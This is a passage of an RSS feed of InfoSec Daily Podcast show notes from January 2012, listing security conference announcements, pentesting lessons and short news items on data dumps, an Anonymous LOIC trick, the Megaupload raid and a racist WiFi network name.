<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.scmagazine.com/arab-facebook-logins-posted-by-israeli-hacker/article/224338"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.scmagazine.com/arab-facebook-logins-posted-by-israeli-hacker/article/224338</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In four separate posting on Saturday to the Pastebin website, an Israeil hacker calling himself Hannibal announced he had published emails and logins of 100,000 allegedly Arab Facebook users. He also made the data available on 14 other file-sharing sites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a published report by an investigator who downloaded the data from the file-sharing sites, the number of stolen Facebook accounts is likely closer to 20,000.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The self-professed &quot;general of Israel&#39;s hackers&quot; claimed to have about 30 million email accounts, 10 million bank accounts and four million credit cards of Arabs from all over the world. His purpose, he stated, is to display his strength &quot;to save Israel&quot; from cyber attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Arabs should learn a lesson and know not to mess with me,&quot; he wrote.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hannibal&#39;s actions are apparently in retaliation for a data dump earlier this month when OxOmar, who claimed to be a member of a Saudi hacking gang Group-XP, declared he had posted banking details on 400,000 Israelis. Israeil banks refuted the claim, asserting that most of the data was outdated and that in actuality only 14,000 records were exposed.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-575-racist-router-aaron-gets-axed-g-required-dreamhosts-nightmare-cbs-hannibal/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3408/0/infosec-daily-podcast-episode-575.mp3" length="15912761" type="audio/mpeg" />
		<itunes:duration>0:32:42</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 575 for January 23, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 575 for January 23, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: https://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135
&#160;
A bigot named their WiFi signal &#8220;F&#8212; All Jews and N&#8212;-&#8221; &#8212; and now cops are investigating.
&#160;
The hateful signal I.D. popped up on the iPhone of a 28-year-old mom inside a Teaneck, N.J. recreation center, where her 3-year-old daughter was attending dance class.
&#160;
The offending signal was coming from a router connected in the Richard Rodda Community Center in the the township, located 10 [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-574-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-574-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 22 Jan 2012 12:07:54 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3404</guid>
		<description><![CDATA[&#160; Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 574 for January 21, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester. &#160; Guests: aricon, coolacid, connection, and spridel &#160; Announcements: Unsung Heroes Have you ever stumbled on your tool while walking and wondered &#8220;Why didn&#8217;t I [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent"><b><span>Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z</span><br />
	<span>InfoSec Daily Podcast Episode 574 for January 21, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.</span></b></p>
<p>&nbsp;</p>
<p><b><span>Guests: aricon, coolacid, connection, and spridel</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Unsung Heroes</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Have you ever stumbled on your tool while walking and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span>http://blog.c22.cc/2012/01/13/unsung-heros</span></a></b></p>
<p><b><br />
		<span>Information Security Blogger Awards 2012</span><br />
		<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><span>ashimmy@hotmail.com</span><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on</span><a href="http://www.ashimmy.com/"><span> </span><span>www.ashimmy.com</span></a><span>.</span></b></p>
<p><b><span>Brad Smith (theNurse)</span><br />
		<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></b></p>
<p><b><span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></b></p>
<p><b><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
		<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></b></p>
<p><b><span>CampusCon 2012</span><br />
		<span>When: January 21, 2012</span><br />
		<span>Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#039;s Road</span><br />
		<a href="http://campuscon.hackingwit.com/"><span>http://campuscon.hackingwit.com</span></a><br />
		<span>(from Baconzombie)</span></b></p>
<p><b><span>New England InfoSec Tweetup</span><br />
		<span>When: January 21, 2012</span><br />
		<span>Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
		<a href="http://neistu3.eventbrite.com/"><span>http://neistu3.eventbrite.com/</span></a></b></p>
<p><b><span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
		<span>When: Starts January 24, 2012</span><br />
		<span>Where: Atlanta, GA</span><br />
		<span>Discount Code:</span><br />
		<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></b></p>
<p><b><span>ShmooCon 2012</span><br />
		<span>When: January 27th-29th, 2012</span><br />
		<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
		<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></b></p>
<p><b><span>Schmoocon Epilogue</span><br />
		<span>When: After Schmoocon</span><br />
		<span>Where: Washington, DC</span><br />
		<span>Hit up anyone in NOVA Hackers</span><br />
		<a href="http://shmooconepilogue.eventbrite.com/"><span>http://shmooconepilogue.eventbrite.com/</span></a></b></p>
<p><b><span>Metasploit Framework Unleashed Cincinnati</span><br />
		<span>When: February 11, 2012.</span><br />
		<span>Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
		<a href="https://msfucincy.wordpress.com/"><span>https://msfucincy.wordpress.com/</span></a><br />
		<span>$20 donation for #HFC</span></b></p>
<p><b><span>Social Engineering Training with Chris Hadgany</span><br />
		<span>When: March 5-9, 2012<br class="kix-line-break" /><br />
		<br />
		Where: Seattle, Washington</span><br />
		<span>When: July 21-24, 2012<br class="kix-line-break" /><br />
		<br />
		Where: Black Hat Vegas</span><br />
		<span>When: August 20-24, 2012</span><br />
		<span>Where: &nbsp;Bristol, UK</span><br />
		<span>When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
		<br />
		Where: &nbsp;Columbia, MD</span><br />
		<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><span>BSides Chicago<br class="kix-line-break" /><br />
		<br />
		</span><span>When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
		<br />
		Where: Volcano Room (further info coming)</span><br />
		<span>Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
		<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span>http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
		<span>They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></b></p>
<p><b><span>Linuxfest Northwest 2012</span><br />
		<span>When: Saturday, April 28th-29th, 2012</span><br />
		<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
		<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>AIDE 2012</span><br />
		<span>When: May 21-25, 2012</span><br />
		<span>Where: MU Forensic Science Center</span><br />
		<span>Huntington, West Virginia</span><br />
		<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>LayerOne 2012</span><br />
		<span>When: May 26-27, 2012</span><br />
		<span>Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
		<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
		<span>When: &nbsp;September 27-30, 2012</span><br />
		<span>Where: Louisville, KY</span><br />
		<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Stories</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><a href="http://arstechnica.com/tech-policy/news/2012/01/internet-wins-sopa-and-pipa-both-shelved.ars"><span> </span></a></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Pentest Lessons:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Adam Compton &amp; Zac Wagle&#039;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span> </span><span>https://twitter.com/pentestlessons</span></a><span>.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 1: </span><span>Don&rsquo;t assume that your client has any idea what you do. &nbsp;Don&rsquo;t assume they aren&rsquo;t interested in hearing about it though. &nbsp;Every time you are talking to the customer, you are representing the company. &nbsp;Educating the client is a great way to build business relationships.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 2:</span><span> &nbsp;Stay within your scope: if you&#039;ve been hired to audit or test &#8211; don&#039;t fix anything.</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>In my reckless youth I popped a box that had a virus on it. &nbsp;I thought I&#039;d be a superhero and remove the virus so I could laugh about it during my report presentation. &nbsp;Instead the machine locked up, and 300 Kilometres away I could FEEL it&#039;s blue screen. Yeah, it was the company&#039;s payroll server.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 3:</span><span> &nbsp;Depending on your engagement agreement, if you fuck up something really important (like a payroll system), don&#039;t wait long before reporting it.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 4:</span><span> If you are doing an audit which consists mostly of interviews, actually perform the interview. Don&rsquo;t go into tangents and stories. It is an interview after all. Ask them to explain their job functions, what they do on a day to day basis, and what types of challenges they run in to. #SoShowMeOrFuckYou</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><span> </span><a href="http://www.wired.com/threatlevel/2012/01/anons-rickroll-botnet/"><span>http://www.wired.com/threatlevel/2012/01/anons-rickroll-botnet/</span></a></b></p>
<p><b><br />
		<span>A version of Anonymous&rsquo; </span><a href="http://cybercrime.hostzi.com/Ym90bmV0/loic/"><span>voluntary botnet software, known as LOIC (Low Orbit Ion Canon)</span></a><span>, was modified to make it not so voluntary, drafting unwary bystanders, journalists and even anons who don&rsquo;t support DDoS tactics into attacks on the U.S. Justice Department. Thursday&rsquo;s trickery seems not to have been central to the successful takedown of sites like justice.gov, RIAA.com and MPAA.com, but not all anons are pleased with forcing unwitting bystanders to join in a potentially illegal action.</span></b></p>
<p><b><span>The trick snagged those who happened to click on a shortened link on social-media services, expecting information on the ongoing #opmegaupload retaliation for the U.S. Justice Department&rsquo;s takedown of popular file sharing site Megaupload. Instead they were greeted by a Javascript version of LOIC &mdash; People were already firing packets at targeted websites by the time their page was loaded.</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.reuters.com/article/2012/01/21/us-internet-piracy-megaupload-idUSTRE80K07Q20120121"><span>http://www.reuters.com/article/2012/01/21/us-internet-piracy-megaupload-idUSTRE80K07Q20120121</span></a></b></p>
<p><b><br />
		<span>A police official said dozens of officers, backed by helicopters, forced their way into the mansion, nestled in lush, rolling farmland, after Dotcom refused them entry, a scene more reminiscent of a high-octane spy drama than the usual policeman&#039;s lot in rural New Zealand.</span><br />
		<span>&quot;Despite our staff clearly identifying themselves, Mr Dotcom retreated into the house and activated a number of electronic-locking mechanisms,&quot; said Detective Inspector Grant Wormald from the Organised and Financial Crime Agency New Zealand.</span><br />
		<span>Officers broke the locks and Dotcom barricaded himself into a safe room which officers had to cut their way through to gain access. </span><br />
		<span>&quot;Once they gained entry into this room, they found Mr Dotcom near a firearm which had the appearance of a shortened shotgun,&quot; he said. &quot;It was definitely not as simple as knocking at the front door.&quot;</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><span> </span><a href="http://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135"><span>http://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135</span></a></b></p>
<p><b><br />
		<span>A bigot named their WiFi signal &ldquo;F&#8212; All Jews and N&#8212;-&rdquo; &mdash; and now cops are investigating.</span></b></p>
<p><b><span>The hateful signal I.D. popped up on the IPHONE of a 28-year-old mom inside a Teaneck, N.J. recreation center, where her 3-year-old daughter was attending dance class.</span></b></p>
<p><b><span>The offending signal was coming from a router connected in the Richard Rodda Community Center in the the township, located 10 miles outside New York City.</span></b></p>
<p><b><span>The Teaneck Police Department Juvenile Bureau and the Bergen County Prosecutor&#039;s Office Computer Crime Unit are investigating it as a &quot;possible bias crime,&quot; Wilson said.</span></b></p>
<p><b><span>Source:</span><span> </span><a href="http://thenextweb.com/dd/2012/01/21/7-ways-to-start-learning-how-to-code-right-now-for-free/"><span>http://thenextweb.com/dd/2012/01/21/7-ways-to-start-learning-how-to-code-right-now-for-free/</span></a></b></p>
<p>&nbsp;</p>
<h3><b><span>1. Processing</span></b></h3>
<p><b><span>2. Codeacademy</span><br />
		<span>3. Bloc (Ruby)</span><br />
		<span>4. Get Physical</span><br />
		<span>5. Start with HTML</span><br />
		<span>6. Grab your iPAD, connect to </span><span>F&#8212; All Jews and N&#8212;-&rdquo; and then </span><span>throw it in a lake.</span><br />
		<span>7. Read, Watch and Fail</span></b></p>
<p><b><span>Source:</span><span> </span><a href="http://www.dontclickshit.com/"><span>http://www.techdirt.com/articles/20120120/14472117492/mpaa-directly-publicly-threatens-politicians-who-arent-corrupt-enough-to-stay-bought.shtml</span></a></b></p>
<p><b><span>Reinforcing the fact that Chris Dodd really does not get what&#039;s happening, and showing just how disgustingly corrupt the MPAA relationship is with politicians, Chris Dodd went on Fox News toexplicitly threaten politicians who accept MPAA campaign donations that they&#039;d better pass Hollywood&#039;s favorite legislation&#8230; or else:</span></b></p>
<p><b><span>&quot;Those who count on quote &#039;Hollywood&#039; for support need to understand that this industry is watching very carefully who&#039;s going to stand up for them when their job is at stake. Don&#039;t ask me to write a check for you when you think your job is at risk and then don&#039;t pay any attention to me when my job is at stake,&quot;</span></b></p>
<p><b><span>This certainly follows what many people </span><span>assumed</span><span> was happening, and fits with the anonymous comments from studio execs that they will stop contributing to Obama, but to be so blatant about this kind of corruption and money-for-laws politics in the face of an extremely angry public is a really, really, </span><span>really</span><span> tone deaf response from Dodd. </span></b></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-574-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3404/0/infosec-daily-podcast-episode-574.mp3" length="24291512" type="audio/mpeg" />
		<itunes:duration>0:50:36</itunes:duration>
		<itunes:subtitle>&#160;
Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 574 for January 21, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
&#160;
Guests: aricon, coolacid, connection, [...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 574 for January 21, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
&#160;
Guests: aricon, coolacid, connection, and spridel
&#160;
Announcements:
Unsung Heroes
Have you ever stumbled on your tool while walking and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

		Information Security Blogger Awards 2012
		Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
Brad Smith (theNurse)
		We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
		http://www.social-engineer.org/bradsmithdonation/
CampusCon 2012
		When: January 21, 2012
		Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#039;s Road
		http://campuscon.hackingwit.com
		(from Baconzombie)
New England InfoSec Tweetup
		When: January 21, 2012
		Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
		http://neistu3.eventbrite.com/
SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
		When: Starts January 24, 2012
		Where: Atlanta, GA
		Discount Code:
		http://www.sans.org/mentor/details.php?nid=25484
ShmooCon 2012
		When: January 27th-29th, 2012
		Where: Washington Hilton Hotel, Washington, DC
		http://www.shmoocon.org
Schmoocon Epilogue
		When: After Schmoocon
		Where: Washington, DC
		Hit up anyone in NOVA Hackers
		http://shmooconepilogue.eventbrite.com/
Metasploit Framework Unleashed Cincinnati
		When: February 11, 2012.
		Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
		https://msfucincy.wordpress.com/
		$20 donation for #HFC
Social Engineering Training with Chris Hadgany
		When: March 5-9, 2012
		
		Where: Seattle, Washington
		When: July 21-24, 2012
		
		Where: Black Hat Vegas
		When: August 20-24, 2012
		Where: &#160;Bristol, UK
		When: &#160;November 12-16, 2012
		
		Where: &#160;Columbia, MD
		http://www.social-engineer.com/social-engineer-training
BSides Chicago
		
		When: Saturday, April 28th, 2012
		
		Where: Volcano Room (further info coming)
		Cost: Free (as always!) &#8211; Registration opening soon!
		http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
		They&#8217;re looking for sponsors, so if you know someone, pass it on.
Linuxfest Northwest 2012
		When: Saturday, April 28th-29th, 2012
		Where: Bellingham Technical College &#8211; Bellingham, WA
		http://www.linuxfestnorthwest.org/
		CFP now open!
AIDE 2012
		When: May 21-25, 2012
		Where: MU Forensic Science Center
		Huntington, West Virginia
		http://aide.marshall.edu
		CFP now open!
LayerOne 2012
		When: May 26-27, 2012
		Where: Clarion Hotel &#8211; Anaheim, CA
		http://www.layerone.org
		CFP now open!
DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
		When: &#160;Septembe[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 573 &#8211; Good Riddance SOPA/PIPA, Young Love, Shallow Talent Pool, IPv6 For Real &amp; Bad Guy’s Google</title>
		<link>http://www.isdpodcast.com/episode-573-good-riddance-sopapipa-young-love-shallow-talent-pool-ipv6-for-real-bad-guys-google</link>
		<comments>http://www.isdpodcast.com/episode-573-good-riddance-sopapipa-young-love-shallow-talent-pool-ipv6-for-real-bad-guys-google#comments</comments>
		<pubDate>Sat, 21 Jan 2012 06:05:57 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3402</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 573 for January 20, 2012. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.22352913008488395" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 573 for January 20, 2012. &nbsp;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
